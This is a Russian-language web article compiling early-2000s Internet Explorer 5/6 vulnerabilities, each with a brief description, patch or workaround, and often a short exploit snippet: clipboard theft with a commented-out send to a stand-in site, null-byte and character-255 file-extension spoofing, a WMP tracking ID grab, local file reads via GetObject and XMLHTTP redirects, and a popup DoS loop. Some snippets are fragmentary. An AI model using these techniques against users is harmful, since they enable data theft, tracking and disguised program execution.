Похищение содержимого буфера обмена
Описание: Начиная с пятой версии имеется возможность считывать и записывать буфер обмена из скрипта, по умолчанию, и без предупреждения. Это может быть полезно для веб-приложений, но может быть использовано злоумышленником для похищения буфера обмена.
function checkClip() { try { var newStr =
clipboardData.getData("Text"); } catch(e) { clearInterval(clipInt);
alert("Couldn't gain access
to the clipboard contents"); } if (clipStr != newStr)
{ // These commented-out lines would send the clipboard
contents. // xmlhttp.open("GET", "http://my.site.com/mysсript.asp",
false); // xmlhttp.send(newStr); alert("This sсript
could now have sent...\n\n" + newStr + "\n\n...to
me!"); clipStr = newStr; } }
Образец применения.
Решение: Измените значение опции Tools > Internet Options > Security > Select a security zone > Custom Level > sсripting > Allow paste operations via sсript.
Автор: Том Глайдер. 12 января 2001.
Подробности об автоматическом запуске программ Об этой уязвимости мы коротко рассказывали ранее, в «Сводке по уязвимостям Internet Explorer 5.0, 5.5, 6.0» под заголовком «Подделка расширения файла». Джоуко Пыннонен, открывший эту уязвимость, опубликовал подробности. Трюк оказался простым — надо просто добавить символ с ASCII-кодом 0 в имя файла. Веб-сервер злоумышленника может установить через заголовок Content-disposition такое имя файла, как README.TXT%00PROG.EXE. Если файл пересылается сервером, как attachment (речь о параметре заголовка Content-disposition, а не приложенном к письму файле), то IE отобразит в диалоге скачивания файла только README.TXT (если не установлена заплатка). Видимо, %00 декодируется, и функции отображения строк трактуют символ, как конец null-terminated строки. А если пользователь нажмёт кнопку «Открыть», то будет использовано полное имя файла и программа запустится.
Если в заголовке Content-disposition вместо attachment написать inline, и правильно выбрать MIME-тип, то браузер скачает и запустит программу без всяких диалогов и предупреждений. MIME-тип может быть установлен через заголовок Content-type. MIME-типы, вызывающие автоматическое открытие файла различаются от версии к версии. Например в IE6 это text/css, а в IE5 audio/midi.
Решение: заплатка от 13 декабря 2001 года.
Подмена расширения файла в Windows Explorer («Проводник») Назовите любой exe-файл «file.html .exe». Используйте символ ASCII с кодом 255 (FF) вместо пробелов. Посмотрите на файл в Windows Explorer — всё, вы увидите только file.html. .exe будет на другой строке... Эээ... Это сложно объяснить, поиграйтесь с эитм и вы сами всё поймёте. Я уверен, что вы можете таким же образом подменить имя файла в Internet Explorer. Также я экспериментировал с именами файлов вроде www.something.com — они выглядят, как интернет-адреса, но на самом деле исполняемые файлы.
Автор: Том Миклович. 15 января 2001.
SuperCookies, обходящие настройки обычных cookie и P3P Описание: Есть проблема с приватностью в Internet Explorer. Она возникла из-за ошибки разработки Windows Media Player (WMP). Используя простой javаsсript веб-сайт может захватить уникальный номер WMP, принадлежащий посетителю сайта. Номер может быть использован как cookie для отслеживания путей пользователя по интернету. Этот ID является SuperCookie, поскольку он может быть использован сайтами для обхода всех средств защиты приватности, добавленных Microsoft в IE 6, который сейчас поставляется со всеми версиями Windows XP. SuperCookies также работают во всех предыдущих версиях IE и Windows. Эксплоит:
alert(document.WMP.ClientID);
Пример использования SuperCookie.
Проблема с функцией GetObject()
Уязвимые версии: 5.5, 6.0.
Описание: Забавная уязвимости вида directory transversal, позволяет убрать из URL протокол и читать локальные файлы. a=GetObject("http://"+lоcation.host+"/../../../../../../test.txt","htmlfile"); Решение: Отключить Active sсripting и никогда не включать. Лучше вообще не использовать Internet Explorer в опасных окружениях, к каким принадлежит интернет.
Автор: Георгий Гунинский. 01 января 2002.
Дополнение от the Pull
Есть ещё кое-что. Я нашёл способ получать информацию о местоположении некоторых файлов. Вот стандартный адрес index.dat: file:///::{450D8FBA-AD25-11D0-98A8-0800361B1103}/../ Local%20Settings/ Temporary%20Internet%20Files/ Content.IE5/index.dat (Пробелы из адреса необходимо убрать. Таких адресов существует много, их использование, правда, может быть неодинаково успешным.)
Код ниже использует этот адрес, показывая полный путь к файлу во всплывающем окне. setTimeout("alert (funObject2.document.body.innerHTML)",500);')" Автор: the Pull. 2 января 2001.
Возможность узнать наличие файла в системе
Описание: Я обнаружил, что вы можете запросить систему о наличии любого файла, если знаете путь к нему. Вот скрипт: Автор: Том Милкович. 3 января 2001.
Локальный DoS с использованием немодальных всплывающих окон
Описание: В Internet Explorer 6 (и, возможно, 5.0) есть баг, который позволяет javаsсript вызвать огромное количество немодальных диалогов, содержащих страницу, вызвавшую их. Окна остаются после уничтожения процесса iexplore, продолжая нагружать процессор. Эксплоит: function exploit() { while(1) { showModelessDialog("exploit.html"); } Решение: Отключить javаsсript.
Автор: Лэнс Хитчкок мл. 6 января 2001.
Доступ к локальным файлам через компонент Microsoft.XMLHTTP
В компоненте Microsoft.XMLHTTP, поставляемом вместе с шестой версией Internet Explorer присутствует ошибка — компонент неправильно обрабатывает HTTP-редиректы на локальные файлы. Чтобы эксплоит работал необходимо знать имя файла.
Уязвимые программные продукты:
IE 6 / Windows 98
IE 6 / Windows XP
IE 6 / Windows 2000 (Service Pack 2)
Эксплоит (отображает содержимое файла C:\jelmer.txt):
function exploit() { // open the file on the users
harddisk using a http redirect var xmlhttp = new
ActiveXObject ("Microsoft.XMLHTTP");
xmlhttp.Open("GET", "servlet/RedirectServlet?fileName=c:/jelmer.txt",
false); xmlhttp.Send(); alert(xmlhttp.responseText); }
Автор эксплоита: jelmer.
Подделка расширения файла
Администратор сервера имеет возможность назвать исполняемый файл README.TXT, index.html или sample.wav. Если пользователь выберет «открыть файл из текущего места» (open the file from its current lоcation), то приложение запуститься без предупреждений. Даже, если скачивание обычного .EXE с сервера вызывает окно с предупреждением. У пользователя нету возможности определить является ли файл программой, а не текстом, HTML или другим безопасным типом файлов.
Уязвимость открыта Jouko Pynnonen.
Уязвимые программные продукты:
IE 5.0
IE 5.5
IE 6.0
Opera 5.12
Пример: http://www.geilerserver.de/text.txt.
Предлагается открыть файл, в случае положительного ответа запускается программа (калькулятор).
Чтобы не подвергаться опасности установите кумулятивный патч Q313675 (MS Security Bulletin MS01-058). Было замечено, что патч невозможно установить через Windows Update, только вручную.
ПОХИЩЕНИЕ COOKIES, ЧТЕНИЕ ФАЙЛОВ С ДИСКА
Просто используя метод javаsсript document.open и не используя document.close можно: похищать cookies; читать локальные файлы, обрабатываемые (parsable) Internet Explorer (HTML, если быть точном); и подменять сайты.
Эксплоиты прилагаются (см. ниже). cookieStealing.html открывает Yahoo.com и похищает cookie. fileReading.html открывает и читает файл C:\test.txt. SiteSpoofing.html скрывает (на Windows 2000) или подменяет (на Windows 98) настоящий адрес документа.
Уязвимые платформы:
IE 6.0.2600.0000, Windows 2000 с установленными Q312461, Q240308, Q313675
IE 6.0.2600.0000, Windows 98 с установленным Q313675
IE 5.5, Windows 2000 SP2
Уязвимость обнаружена группой the Pull. Заплатка для устранения этой уязвимости пока не выпущена.
Как включить Пятый уровень безопасности в ie 6.0
Вообще пятый уровень всегда скрыт, т.к. обычным пользователям это не нужно. Но если Вы не обычный пользователь и Вам нужен уровень безопастности выше стандартного максимального, то тогда зайдите в редактор реестра и найдите:
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternetSettingsones "Flags"=dword: 0X00000021 (33) ---default
И надо заменить опцию на
"Flags"=dword: 0X00000001 (1)
После этого перегружайтесь и - все!
Опубликовал Kest
October 26 2008 13:40:55 ·
0 Комментариев ·
8514 Прочтений ·
• Не нашли ответ на свой вопрос? Тогда задайте вопрос в комментариях или на форуме! •
Комментарии
Нет комментариев.
Добавить комментарий
Рейтинги
Рейтинг доступен только для пользователей.
Пожалуйста, залогиньтесь или зарегистрируйтесь для голосования.
Нет данных для оценки.
Гость
Вы не зарегистрированны? Нажмите здесь для регистрации.